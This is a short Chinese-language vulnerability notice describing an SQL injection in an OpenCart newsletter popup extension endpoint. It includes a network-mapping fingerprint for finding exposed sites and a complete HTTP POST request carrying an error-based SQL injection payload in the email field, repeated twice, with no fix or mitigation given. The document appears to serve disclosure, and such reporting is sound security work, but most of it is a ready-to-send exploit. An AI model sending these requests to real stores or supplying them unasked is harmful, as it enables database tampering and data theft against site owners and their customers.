OpenCart电子商务建站系统extension存在SQL注入漏洞
一、漏洞概述
OpenCart是全球主流的 PHP 开源电子商务建站系统。OpenCart独立站建站系统安装方便、功能强大、操作简单。支持多语言、多货币、多店铺等功能。OpenCart系统开发生态圈丰富,可对接 Odoo、Beahu SCM、用友、金蝶等知名ERP 系统。opencart 通讯模块 extension接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
二、网络测绘
body="extension/module/so_newletter_custom_popup/newsletter"
三、漏洞复现
POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
createdate=2024-5-15 09:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT md5(123)),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)#&status=0
POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
createdate=2024-5-15 09:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT md5(123)),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)#&status=0